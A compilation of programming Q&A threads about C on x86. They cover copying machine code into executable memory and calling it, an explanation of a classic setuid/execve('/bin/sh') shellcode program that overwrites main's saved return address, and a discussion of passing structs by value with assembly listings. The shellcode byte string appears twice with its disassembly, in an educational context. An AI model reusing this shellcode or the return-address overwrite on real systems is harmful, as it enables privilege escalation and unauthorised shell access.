Then (MicrosoftC under Windows) feed it to "cl /Fa /c foo.c". Then I can look at "foo.asm":
_Data$ = 8
; Line 2
push ebp
mov ebp, esp
; Line 3
xor eax, eax
cmp DWORD PTR _Data$[ebp], 0
setne al
; Line 4
pop ebp
ret 0
I could also use "dumpbin /all foo.obj" to see that the exact bytes of the function were:
00000000: 55 8B EC 33 C0 83 7D 08 00 0F 95 C0 5D C3
Just saves me some time getting the bytes exactly right...

c generate function and call it

#include <stdio.h>
#define uint unsigned int
#define AddressOfLabel(sectionname,out) __asm{mov [out],offset sectionname};
void* CreateFunction(void* start,void *end) {
uint __start=(uint)start,__end=(uint)end-1
,size,__func_runtime;
void* func_runtime=malloc(size=(((__end)-(__start)))+1);
__func_runtime=(uint)func_runtime;
memcpy((void*)(__func_runtime),start,size);
((char*)func_runtime)[size]=0xC3; //ret
return func_runtime;
}
void CallRuntimeFunction(void* address) {
__asm {
call address
}
}
main() {
void* _start,*_end;
AddressOfLabel(__start,_start);
AddressOfLabel(__end,_end);
void* func = CreateFunction(_start,_end);
CallRuntimeFunction(func); //I expected this method to print "Test"
//but this method raised exception
return 0;
__start:
printf("Test");
__end:
}
CreateFunction - takes two points in memory (function scope), allocates memory, copies the code between them into it, and returns it (the void* is used like a function to call from assembly)
CallRuntimeFunction - runs the function returned by CreateFunction
#define AddressOfLabel(sectionname,out) - writes the address of the label (sectionname) to the variable (out)
When I debugged this code, stepped into the call to CallRuntimeFunction, and went to the disassembly,
I saw a lot of ??? instead of the assembly code between the __start and __end labels.
I tried to copy the machine code between the two labels and then run it, but I have no idea why I can't call a function that was allocated with malloc.
Edit:
I changed some of the code and got part of it working.
Memory allocation for the runtime function:
void* func_runtime=VirtualAlloc(0, size=(((__end)-(__start)))+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Copy from function scope:
CopyMemory((void*)(__func_runtime),start,size-1);
But when I ran this program I saw this:
mov esi,esp
push 0E4FD14h
call dword ptr ds:[0E55598h] ; <--- printf ,after that I don't know what is it
add esp,4
cmp esi,esp
call 000B9DBB ; <--- here
mov dword ptr [ebp-198h],0
lea ecx,[ebp-34h]
call 000B9C17
mov eax,dword ptr [ebp-198h]
jmp 000D01CB
ret
Here it enters another function and weird things happen.
void CallRuntimeFunction(void* address) {
__asm {
call address
}
}
Here address is a "pointer" to a parameter of this function, which is itself a pointer: a pointer to a pointer.
Use:
void CallRuntimeFunction(void* address) {
_asm {
mov ecx,[address] //we get address of "func"
mov ecx,[ecx] //we get "func"
call [ecx] //we jump func(ecx is an address. yes)
}
}
You want to call func, which is a pointer. When it is passed to your CallRuntimeFunction function, this generates a new pointer that points to that pointer: a pointer of the second degree.
void* func = CreateFunction(_start,_end);
Yes, func is a pointer.
Important: check your compiler's "calling convention" options. Try the cdecl one.
Be sure to invalidate the caches (both instruction and data) between the function code generation and its calling. See self-modifying code for further info.

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //set ret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to the int-sized slot that lies two ints above ret on the stack. Supposedly that's where the return address is located, i.e. where the program will continue when main returns.
3) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
|  function arguments     |                      |
|  (e.g. argv, argc)      |                      |  (note: the stack
+-------------------------+  <-- ss:esp + 12     |   grows downward!)
|  return address         |                      |
+-------------------------+  <-- ss:esp + 8      V
|  saved ebp register     |
+-------------------------+  <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |
+-------------------------+  <-- ss:esp + 0  /  ss:ebp - 4
At the bottom lies ret (a 32-bit pointer on this platform). Above it is the saved ebp register (also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments, argc and argv, but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because the expression has type int*, and an int is 32 bits wide here, so adding 2 yields a memory location 2 × 32 bits (= 64 bits) above (int*)&ret, which would be the return address's location if all the assumptions in the above paragraph are correct.
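The scaling of pointer arithmetic described above can be checked without touching a stack frame at all. Here is a minimal sketch that uses an ordinary array; the names slots, byte_distance and two_ints_in_bytes are made up for illustration, and the code assumes nothing about where a return address lives.

```c
#include <stddef.h>

/* Hypothetical helper: number of bytes between two int pointers
   that point into the same array. */
static size_t byte_distance(const int *from, const int *to)
{
    return (size_t)((const char *)to - (const char *)from);
}

/* Returns how many bytes "+ 2" moves an int pointer. */
size_t two_ints_in_bytes(void)
{
    int slots[4] = {0, 0, 0, 0};
    int *p = slots;   /* points at slots[0] */
    int *q = p + 2;   /* points at slots[2], not 2 bytes further */
    return byte_distance(p, q);
}
```

On a platform where int is 32 bits wide, two_ints_in_bytes() gives 8, which is the 64-bit offset discussed above.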
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
ret
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh";
x[1] = 0;
execve("/bin/sh", &x[0], &x[1]);
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include its origin next time.
From that same document, on how to code stack-based exploits:
/* the shellcode is hex for: */
#include <stdio.h>
#include <unistd.h>
int main(void) {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three such numbers together form an opcode (google for it). Together they form machine code that can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This just spawns /bin/sh, much like execve("/bin/sh", NULL, NULL); in C.

Are there any downsides to passing structs by value in C, rather than passing a pointer?

If the struct is large, there is obviously the performance aspect of copying lots of data, but for a smaller struct, it should basically be the same as passing several values to a function.
It is maybe even more interesting when used as return values. C only has single return values from functions, but you often need several. So a simple solution is to put them in a struct and return that.
Are there any reasons for or against this?
Since it might not be obvious to everyone what I'm talking about here, I'll give a simple example.
If you're programming in C, you'll sooner or later start writing functions that look like this:
void examine_data(const char *ptr, size_t len)
{
...
}
char *p = ...;
size_t l = ...;
examine_data(p, l);
This isn't a problem. The only issue is that you have to agree with your coworkers on the order of the parameters so that you use the same convention in all functions.
But what happens when you want to return the same kind of information? You typically get something like this:
char *get_data(size_t *len)
{
...
*len = ...datalen...;
return ...data...;
}
size_t len;
char *p = get_data(&len);
This works fine, but is much more problematic. A return value is a return value, except that in this implementation it isn't. There is no way to tell from the above that the function get_data isn't allowed to look at what len points to. And there is nothing that makes the compiler check that a value is actually returned through that pointer. So next month, when someone else modifies the code without understanding it properly (because he didn't read the documentation?) it gets broken without anyone noticing, or it starts crashing randomly.
So, the solution I propose is the simple struct
struct blob { char *ptr; size_t len; };
The examples can be rewritten like this:
void examine_data(const struct blob data)
{
... use data.ptr and data.len ...
}
struct blob blob = { .ptr = ..., .len = ... };
examine_data(blob);
struct blob get_data(void)
{
...
return (struct blob){ .ptr = ...data..., .len = ...len... };
}
struct blob data = get_data();
For some reason, I think that most people would instinctively make examine_data take a pointer to a struct blob, but I don't see why. It still gets a pointer and an integer, it's just much clearer that they go together. And in the get_data case it is impossible to mess up in the way I described before, since there is no input value for the length, and there must be a returned length.
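To make the idea concrete, here is a minimal compilable sketch of the struct-based versions. It is only an illustration under a few assumptions: the data is a fixed placeholder string, ptr is declared const char * for the sketch, and examine_data is given a made-up job (counting a byte) and a return value so there is something to observe.

```c
#include <stddef.h>
#include <string.h>

struct blob {
    const char *ptr;  /* start of the data (not owned by the struct) */
    size_t len;       /* number of bytes at ptr */
};

/* Returns pointer and length together; there is no out-parameter to forget. */
struct blob get_data(void)
{
    static const char text[] = "hello";   /* placeholder data for the sketch */
    return (struct blob){ .ptr = text, .len = strlen(text) };
}

/* Takes the pair by value; counting a byte stands in for "examining". */
size_t examine_data(struct blob data, char wanted)
{
    size_t hits = 0;
    for (size_t i = 0; i < data.len; i++) {
        if (data.ptr[i] == wanted)
            hits++;
    }
    return hits;
}
```

A call then reads examine_data(get_data(), 'l'), with no separate length variable to keep in sync.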
For small structs (e.g. point, rect) passing by value is perfectly acceptable. But apart from speed, there is one other reason to be careful about passing or returning large structs by value: stack space.
A lot of C programming is for embedded systems, where memory is at a premium, and stack sizes may be measured in KB or even Bytes... If you're passing or returning structs by value, copies of those structs will get placed on the stack, potentially causing the situation that this site is named after...
If I see an application that seems to have excessive stack usage, structs passed by value is one of the things I look for first.
One reason not to do this that has not been mentioned is that it can cause problems where binary compatibility matters.
Depending on the compiler options and implementation, structures can be passed via the stack or in registers.
See: http://gcc.gnu.org/onlinedocs/gcc/Code-Gen-Options.html
-fpcc-struct-return
-freg-struct-return
If two compilers disagree, things can blow up. Needless to say, the main reasons not to do this are stack consumption and performance.
To really answer this question, one needs to dig deep into the assembly land:
(The following example uses gcc on x86_64. Anyone is welcome to add other architectures like MSVC, ARM, etc.)
Let's have our example program:
// foo.c
typedef struct
{
double x, y;
} point;
void give_two_doubles(double * x, double * y)
{
*x = 1.0;
*y = 2.0;
}
point give_point()
{
point a = {1.0, 2.0};
return a;
}
int main()
{
return 0;
}
Compile it with full optimizations
gcc -Wall -O3 foo.c -o foo
Look at the assembly:
objdump -d foo | vim -
This is what we get:
0000000000400480 <give_two_doubles>:
400480: 48 ba 00 00 00 00 00 mov $0x3ff0000000000000,%rdx
400487: 00 f0 3f
40048a: 48 b8 00 00 00 00 00 mov $0x4000000000000000,%rax
400491: 00 00 40
400494: 48 89 17 mov %rdx,(%rdi)
400497: 48 89 06 mov %rax,(%rsi)
40049a: c3 retq
40049b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
00000000004004a0 <give_point>:
4004a0: 66 0f 28 05 28 01 00 movapd 0x128(%rip),%xmm0
4004a7: 00
4004a8: 66 0f 29 44 24 e8 movapd %xmm0,-0x18(%rsp)
4004ae: f2 0f 10 05 12 01 00 movsd 0x112(%rip),%xmm0
4004b5: 00
4004b6: f2 0f 10 4c 24 f0 movsd -0x10(%rsp),%xmm1
4004bc: c3 retq
4004bd: 0f 1f 00 nopl (%rax)
Excluding the nopl padding, give_two_doubles() takes 27 bytes while give_point() takes 29 bytes. In the listing above, both functions consist of five instructions.
What's interesting is that we notice the compiler has been able to optimize mov into the faster SSE2 variants movapd and movsd. Furthermore, give_two_doubles() actually moves data in and out from memory, which makes things slow.
Apparently much of this may not be applicable in embedded environments (which is where the playing field for C is most of the time nowadays). I'm not an assembly wizard, so any comments would be welcome!
One thing people here have forgotten to mention so far (or I overlooked it) is that structs usually have padding!
struct {
short a;
char b;
short c;
char d;
};
Every char is 1 byte, every short is 2 bytes. How large is the struct? Nope, it's not 6 bytes. At least not on most commonly used systems. On most systems it will be 8. The problem is that the alignment is not constant; it's system dependent, so the same struct will have different alignment and different sizes on different systems.
Not only will that padding eat further into your stack, it also adds uncertainty: you cannot predict the padding in advance unless you know how your system pads and then look at every single struct in your app and calculate its size. Passing a pointer takes a predictable amount of space; there is no uncertainty. The size of a pointer is known for the system, it is always the same regardless of what the struct looks like, and pointer sizes are always chosen so that they are aligned and need no padding.
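If you would rather measure than guess, sizeof and offsetof report what your compiler actually does. This is a small sketch; the struct tag sample and the two helper functions are names made up for illustration, and the numbers they yield depend on the platform.

```c
#include <stddef.h>

struct sample {
    short a;
    char  b;
    short c;
    char  d;
};

/* Sum of the member sizes, i.e. the size the struct would have without padding. */
size_t sample_payload_size(void)
{
    return sizeof(short) + sizeof(char) + sizeof(short) + sizeof(char);
}

/* Bytes the compiler added as padding on this platform. */
size_t sample_padding(void)
{
    return sizeof(struct sample) - sample_payload_size();
}
```

Printing sizeof(struct sample), offsetof(struct sample, c) and sample_padding() on each target shows where the extra bytes go; with 2-byte shorts aligned to 2 bytes, c cannot start directly after b.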
A simple solution is to return an error code as the return value and pass everything else as parameters to the function.
Such a parameter can be a struct, of course, but I don't see any particular advantage in passing it by value; just send a pointer.
Passing a structure by value is dangerous; you need to be very careful about what you are passing. Remember that there is no copy constructor in C: if one of the structure's members is a pointer, only the pointer value is copied, which can be very confusing and hard to maintain.
Just to complete the answer (full credit to Roddy): stack usage is another reason not to pass structures by value. Believe me, debugging a stack overflow is a real PITA.
Reply to comment:
Passing a struct by pointer means that some entity owns the object and knows exactly what should be released and when. Passing a struct by value creates hidden references to the internal data of the struct (pointers to other structures, etc.), and this is hard to maintain (possible, but why?).
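A short sketch of the shallow-copy behaviour described above; struct message and shout are hypothetical names used only for this illustration. The callee gets its own copy of the struct, yet the pointer inside that copy still refers to the caller's buffer.

```c
#include <string.h>

struct message {
    char *text;   /* points at a buffer owned by someone else */
    int   id;
};

/* Receives a copy of the struct, but the copy's pointer still
   refers to the caller's buffer. */
void shout(struct message m)
{
    m.id = -1;                       /* changes only the local copy */
    if (m.text != NULL && m.text[0] != '\0')
        m.text[0] = 'H';             /* changes the caller's buffer */
}
```

After calling shout(msg), msg.id is unchanged, but the first character of the buffer msg.text points at has been overwritten.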
Here's something no one mentioned:
void examine_data(const char *c, size_t l)
{
c[0] = 'l'; // compiler error
}
void examine_data(const struct blob blob)
{
blob.ptr[0] = 'l'; // perfectly legal, quite likely to blow up at runtime
}
Members of a const struct are const, but if that member is a pointer (like char *), it becomes char *const rather than the const char * we really want. Of course, we could assume that the const is documentation of intent, and that anyone who violates this is writing bad code (which they are), but that's not good enough for some (especially those who just spent four hours tracking down the cause of a crash).
The alternative might be to make a struct const_blob { const char *c; size_t l } and use that, but that's rather messy - it gets into the same naming-scheme problem I have with typedefing pointers. Thus, most people stick to just having two parameters (or, more likely for this case, using a string library).
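For what it's worth, the const_blob alternative could look roughly like the sketch below. The member names ptr and len (instead of c and l) and the helpers blob_view and count_spaces are my own choices for illustration, not part of the question.

```c
#include <stddef.h>

struct blob       { char *ptr;       size_t len; };
struct const_blob { const char *ptr; size_t len; };  /* read-only view */

/* Hypothetical helper: build a read-only view of an existing blob. */
struct const_blob blob_view(struct blob b)
{
    return (struct const_blob){ .ptr = b.ptr, .len = b.len };
}

/* With const_blob, writing through data.ptr no longer compiles. */
size_t count_spaces(struct const_blob data)
{
    size_t n = 0;
    for (size_t i = 0; i < data.len; i++) {
        if (data.ptr[i] == ' ')
            n++;
        /* data.ptr[i] = '_';   would be rejected by the compiler here */
    }
    return n;
}
```

The price is exactly the messiness mentioned above: two nearly identical types plus a conversion helper.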
I think that your question has summed things up pretty well.
One other advantage of passing structs by value is that memory ownership is explicit. There is no wondering whether the struct is from the heap, or who has the responsibility for freeing it.
I'd say passing (not-too-large) structs by value, both as parameters and as return values, is a perfectly legitimate technique. One has to take care, of course, that the struct is either a POD type, or the copy semantics are well-specified.
Update: Sorry, I had my C++ thinking cap on. I recall a time when it was not legal in C to return a struct from a function, but this has probably changed since then. I would still say it's valid as long as all the compilers you expect to use support the practice.
Page 150 of PC Assembly Tutorial on http://www.drpaulcarter.com/pcasm/ has a clear explanation about how C allows a function to return a struct:
C also allows a structure type to be used as the return value of a function. Obviously a structure can not be returned in the EAX register. Different compilers handle this situation differently. A common solution that compilers use is to internally rewrite the function as one that takes a structure pointer as a parameter. The pointer is used to put the return value into a structure defined outside of the routine called.
I use the following C code to verify the above statement:
struct person {
int no;
int age;
};
struct person create() {
struct person jingguo = { .no = 1, .age = 2};
return jingguo;
}
int main(int argc, const char *argv[]) {
struct person result;
result = create();
return 0;
}
Use "gcc -S" to generate assembly for this piece of C code:
.file "foo.c"
.text
.globl create
.type create, #function
create:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl 8(%ebp), %ecx
movl $1, -8(%ebp)
movl $2, -4(%ebp)
movl -8(%ebp), %eax
movl -4(%ebp), %edx
movl %eax, (%ecx)
movl %edx, 4(%ecx)
movl %ecx, %eax
leave
ret $4
.size create, .-create
.globl main
.type main, #function
main:
pushl %ebp
movl %esp, %ebp
subl $20, %esp
leal -8(%ebp), %eax
movl %eax, (%esp)
call create
subl $4, %esp
movl $0, %eax
leave
ret
.size main, .-main
.ident "GCC: (Ubuntu 4.4.3-4ubuntu5) 4.4.3"
.section .note.GNU-stack,"",#progbits
The stack before call create:
        +---------------------------+
ebp     | saved ebp                 |
        +---------------------------+
ebp-4   | age part of struct person |
        +---------------------------+
ebp-8   | no part of struct person  |
        +---------------------------+
ebp-12  |                           |
        +---------------------------+
ebp-16  |                           |
        +---------------------------+
ebp-20  | ebp-8 (address)           |
        +---------------------------+
The stack right after calling create:
        +---------------------------+
        | ebp-8 (address)           |
        +---------------------------+
        | return address            |
        +---------------------------+
ebp,esp | saved ebp                 |
        +---------------------------+
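Expressed back in C, the rewrite that the tutorial describes and that the listing shows looks roughly like the second function below. This is only a sketch of the idea; create_rewritten is a made-up name, and the real calling convention details (such as "ret $4" popping the hidden argument) have no C equivalent.

```c
struct person {
    int no;
    int age;
};

/* What the source code says: return the struct by value. */
struct person create(void)
{
    struct person p = { .no = 1, .age = 2 };
    return p;
}

/* Roughly what the generated code does: the caller passes the address
   of the result slot, the callee fills it in and hands the address back. */
struct person *create_rewritten(struct person *result)
{
    result->no = 1;
    result->age = 2;
    return result;   /* corresponds to "movl %ecx, %eax" in the listing */
}
```

In main, the call result = create(); then corresponds to create_rewritten(&result), with &result being the ebp-8 address pushed before the call.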
I just want to point out one advantage of passing your structs by value: an optimizing compiler may be able to optimize your code better.
Taking into account all of the things people have said...
Returning a struct was not always allowed in C. Now it is.
Returning a struct can be done in three ways:
a. Returning each member in a register (probably optimal, but unlikely to be what actually happens)
b. Returning the struct on the stack (slower than registers, but still better than a cold access to heap RAM... yay caching!)
c. Returning the struct through a pointer to the heap (it only hurts when you read or write it; a good compiler may reorder instructions so that the access is issued well before the value is needed and the data is ready when you are... (shiver))
Because of this, different compiler settings can cause problems where separately compiled code interfaces (different register sizes, different amounts of padding, different optimizations turned on).
const-ness and volatile-ness don't propagate through a struct, which can result in miserably inefficient or even broken code (e.g. for a const struct foo with a pointer member bar, the data that foo.bar points to is not const).
Some simple measures I will take after reading this...
Make your functions accept parameters rather than structs. It allows fine-grained control over const-ness, volatile-ness, etc., and it also ensures that all the variables passed are relevant to the function using them. If the parameters are all of the same kind, use some other method to enforce ordering. (Use typedefs to make your function calls more strongly typed, which an OS does routinely.)
Instead of allowing the final base function to return a pointer to a structure made on the heap, provide a pointer to a struct to put the results into. That struct still might be on the heap, but it is possible that it is actually on the stack, which gives better runtime performance. It also means that you do not need to rely on compilers providing you with a struct return type.
By passing the parameters as pieces and being clear about the const-ness, volatile-ness, or restrict-ness, you better convey your intentions to the compiler, and that allows it to make better optimizations.
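As an illustration of these measures, here is a minimal sketch; struct stats and compute_stats are hypothetical names. The inputs arrive as individually qualified parameters, the result goes into a struct that the caller provides, and the return value is only a status code.

```c
#include <stddef.h>

struct stats {
    int min;
    int max;
};

/* Inputs are passed as separate, individually qualified parameters;
   the result goes into a struct the caller provides (stack or heap).
   Returns 0 on success, -1 if there is nothing to examine. */
int compute_stats(const int *restrict values, size_t count,
                  struct stats *restrict out)
{
    if (values == NULL || out == NULL || count == 0)
        return -1;

    out->min = values[0];
    out->max = values[0];
    for (size_t i = 1; i < count; i++) {
        if (values[i] < out->min) out->min = values[i];
        if (values[i] > out->max) out->max = values[i];
    }
    return 0;
}
```

The caller decides where the struct stats lives, for example a local variable passed as &s, so no heap allocation or struct return type is involved.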
I am not sure where 'too big' and 'too small' lie, but I guess the answer is between 2 and register count + 1 members.
If I make a struct that holds 1 member that is an int, then clearly we should not pass the struct. (Not only is it inefficient, it also makes the intention VERY murky... I suppose it has a use somewhere, but not a common one.)
If I make a struct that holds two items, it might have value in clarity, and compilers might optimize it into two variables that travel as a pair. (risc-v specifies that a struct with two members returns both members in registers, assuming they are ints or smaller...)
If I make a structure that holds as many ints and doubles as the processor has registers for, it is TECHNICALLY a possible optimization.
The instant I exceed the register count, though, it probably would have been worth it to keep the result struct behind a pointer, and pass in only the parameters that were relevant. (That, and probably make the struct smaller and the function do less, because we have a LOT of registers on systems nowadays, even in the embedded world...)

Resources